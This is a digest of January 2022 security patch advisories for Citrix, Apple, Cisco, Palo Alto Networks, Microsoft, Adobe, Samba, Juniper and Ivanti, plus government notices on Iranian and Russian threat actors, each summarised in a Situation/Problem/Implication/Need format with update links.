- Citrix Releases Security Updates for Hypervisor
- Apple Releases Security Updates for iOS and iPadOS
- CNMF Identifies and Discloses Malware used by Iranian APT MuddyWater
- Cisco Releases Security Updates for Multiple Products
- New Palo Alto Networks Security Advisories
- Microsoft Releases January 2022 Security Updates
- Adobe Releases Security Updates for Multiple Products
- Citrix Releases Security Update for Workspace App for Linux
- Samba Releases Security Update
- CISA, FBI, and NSA Release Cybersecurity Advisory on Russian Cyber Threats to U.S. Critical Infrastructure
- Juniper Networks Releases Security Updates for Multiple Products
- Ivanti Has Released Security Updates for Multiple Products
_______________________________
Citrix Releases Security Updates for Hypervisor
Situation
Citrix has released security updates to address a vulnerability in Hypervisor.
Problem
Several security issues have been identified in Citrix Hypervisor, that may allow privileged code in a guest VM to cause the host to crash or become unresponsive.
Implication
An attacker could exploit some of this vulnerability to take control of an affected system.
Need
Citrix has released hotfixes to address these issues. Citrix recommends that affected customers install these hotfixes:
Citrix Hypervisor 8.2 CU1 LTSR: CTX338448 – https://support.citrix.com/article/CTX338448 and CTX335882 – https://support.citrix.com/article/CTX335882
Citrix Hypervisor 8.2: CTX338444 – https://support.citrix.com/article/CTX338444 and CTX335880 – https://support.citrix.com/article/CTX335880
Citrix XenServer 7.1 LTSR CU2: CTX335531 – https://support.citrix.com/article/CTX335531 and CTX335881 – https://support.citrix.com/article/CTX335881
For a more technical overview:
https://support.citrix.com/article/CTX335432
________________________________
Apple Releases Security Updates for iOS and iPadOS
Situation
Apple has released security updates to address a vulnerability affecting iOS 15.2.1 and iPadOS 15.2.1.
Problem
For their customers’ protection, Apple doesn’t disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.
Implication
An attacker could exploit this vulnerability to cause a denial-of-service condition.
Need
CISA encourages users and administrators to review the Apple security page for iOS 15.2.1 and iPadOS 15.2.1 and apply the necessary updates.
For a brief overview:
For a more technical overview:
https://support.apple.com/en-us/HT213043
________________________________
CNMF Identifies and Discloses Malware used by Iranian APT MuddyWater
Situation
U.S. Cyber Command’s Cyber National Mission Force (CNMF) has identified multiple open-source tools used by an Iranian advanced persistent threat (APT) group known as MuddyWater.
Problem
According to CNMF, “MuddyWater has been seen using a variety of techniques to maintain access to victim networks. These include side-loading DLLs to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.”
Implication
Should a network operator identify multiple of the tools on the same network, it may indicate the presence of Iranian malicious cyber actors.
Need
CISA encourages users and administrators to review U.S. Cyber Command’s press release, Iranian intel cyber suite of malware uses open source tools, as well as their VirusTotal page for more information.
For a brief overview:
For a more technical overview:
________________________________
Cisco Releases Security Updates for Multiple Products
Situation
Cisco has released security updates to address a vulnerability affecting Cisco Unified Contact Center Management Portal (Unified CCMP) and Cisco Unified Contact Center Domain Manager (Unified CCDM).
Problem
A vulnerability in the web-based management interface of Cisco Unified Contact Center Management Portal (Unified CCMP) and Cisco Unified Contact Center Domain Manager (Unified CCDM) could allow an authenticated, remote attacker to elevate their privileges to Administrator.
Implication
A remote attacker could exploit this vulnerability to take control of an affected system.
Need
CISCA encourages users and administrators to review Cisco Security Advisory cisco-sa-ccmp-priv-esc-JzhTFLm4 and apply the necessary updates.
For a brief overview:
For a more technical overview:
________________________________
New Palo Alto Networks Security Advisories
Situation
Palo Alto Networks has published 4 new Security Advisories at https://security.paloaltonetworks.com on January 12, 2022:
Problem
There are confirmed vulnerabilities present in Cortex XDR Agent, including: An Uncontrolled Search Path Element Leads to Local Privilege Escalation, Unintended Program Execution When Using Live Terminal Session, Local Arbitrary File Deletion Vulnerability, and File Information Exposure Vulnerability When Generating Support File.
Implication
Failing to heed these advisories and follow appropriate guidelines could leave one vulnerable to compromise.
Need
Please review the appropriate advisories at https://security.paloaltonetworks.com and follow relevant guidelines.
For a brief overview:
https://security.paloaltonetworks.com/
________________________________
Microsoft Releases January 2022 Security Updates
Situation
Microsoft has released updates to address multiple vulnerabilities in Microsoft software.
Implication
An attacker could exploit some of these vulnerabilities to take control of an affected system.
Need
CISA encourages users and administrators to review Microsoft’s January 2022 Security Update Summary and Deployment Information and apply the necessary updates.
For a brief overview:
For a more technical overview:
https://msrc.microsoft.com/update-guide/releaseNote/2022-Jan
________________________________
Adobe Releases Security Updates for Multiple Products
Situation
Adobe has released security updates for multiple products including Acrobat, Reader, Illustrator, Bridge, InCopy, and InDesign for both Windows and macOS.
Problem
The vulnerabilities that have been patched include arbitrary code execution, privilege escalation, use-after-free, Out-of-bounds read and write, and more.
Implication
If attacker is successfully able to exploit some of these vulnerabilities it could allow them to take control of an affected device.
Need
Adobe recommends applying the latest updates for Acrobat and Reader, Illustrator, Bridge, InCopy, and InDesign to protect against these vulnerabilities. For additional information and patch notes please visit the links below.
For a brief overview:
Adobe Security Bulletins:
https://helpx.adobe.com/security.html/security/security-bulletin.ug.html
________________________________
Citrix Releases Security Update for Workspace App for Linux
Situation
Citrix has released a security update to address a vulnerability in Workspace App for Linux.
Problem
A vulnerability in Citrix Workspace app for Linux could result in a local user elevating their privilege level to root. This vulnerability affects Citrix Workspace app for Linux 2012-2111 and only exists if App Protection was installed as part of Citrix Workspace app for Linux.
Implication
An attacker could exploit some of this vulnerability to take control of an affected system.
Need
Update Citrix Workspace App for Linux 2112 and later versions
For a more technical overview:
https://support.citrix.com/article/CTX338435
________________________________
Samba Releases Security Update
Situation
The Samba Team has released a security update to address a vulnerability in multiple versions of Samba. All versions of the Samba file server prior to 4.13.16 are affected.
Problem
A malicious client can use a symlink race to create a directory in a part of the server file system not exported under the share definition. The user must have permissions to create the directory in the target directory.
Implication
An attacker could exploit this vulnerability to take control of an affected system.
Need
Update Samba to 4.13.16 or later.
For a more technical overview:
https://www.samba.org/samba/security/CVE-2021-43566.html
________________________________
CISA, FBI, and NSA Release Cybersecurity Advisory on Russian Cyber Threats to U.S. Critical Infrastructure
Situation
The CISA, FBI, and NSA have released a joint advisory on Russian state-sponsored cyber operations that includes tactics, techniques, and procedures.
Problem
Russian cyberactivity are using various tactics to steal intellectual property, influence political activity, and more.
Implication
Russian activity is seen to be able to inflict damage on critical infrastructure in the US and other countries.
Need
Review Russian IOCs and Russian cyber tactics.
For a brief overview:
https://www.cisa.gov/uscert/russia
________________________________
Juniper Networks Releases Security Updates for Multiple Products
Situation
Juniper Networks has released security updates to address vulnerabilities affecting multiple products.
Problem
There are multiple updates for multiple products. Please review the Juniper security advisories page linked below for relevant products.
Implication
An attacker could exploit some of these vulnerabilities to take control of an affected system.
Need
CISA encourages users and administrators to review the Juniper Networks security advisories page and apply the necessary updates.
For a brief overview:
For a more technical overview:
https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES
________________________________
Ivanti Has Released Security Updates for Multiple Products
Situation
Ivanti has recently updated its Log4j security advisory as well as added new security updates.
Problem
Ivanti has recently issued new advisories and patches for the software Avalanche; File Director; and MobileIron Core, MobileIron Sentry (Core/Cloud), and MobileIron Core Connector. That addresses each one of the products issue with the Log4J (CVE-2021-44228).
Implication
If an unauthenticated attacker successfully exploits this vulnerability it could allow them to take control of the affected system.
Need
The CISA encourages users and administrators to review the Ivanti security advisories pages for Avalanche; File Director; and MobileIron Core, MobileIron Sentry (Core/Cloud), and MobileIron Core Connector and apply the necessary updates and workarounds.
Brief Overview:
Ivanti Log4j Security Advisory: